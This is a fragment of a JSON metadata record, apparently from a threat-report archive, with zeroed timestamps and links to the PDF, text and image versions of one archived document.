	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.pdf",
		"text": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.txt",
		"img": "https://archive.orkl.eu/e699b65ac7f5c9c09cc5b9bada429369da92fb0e.jpg"
	}
}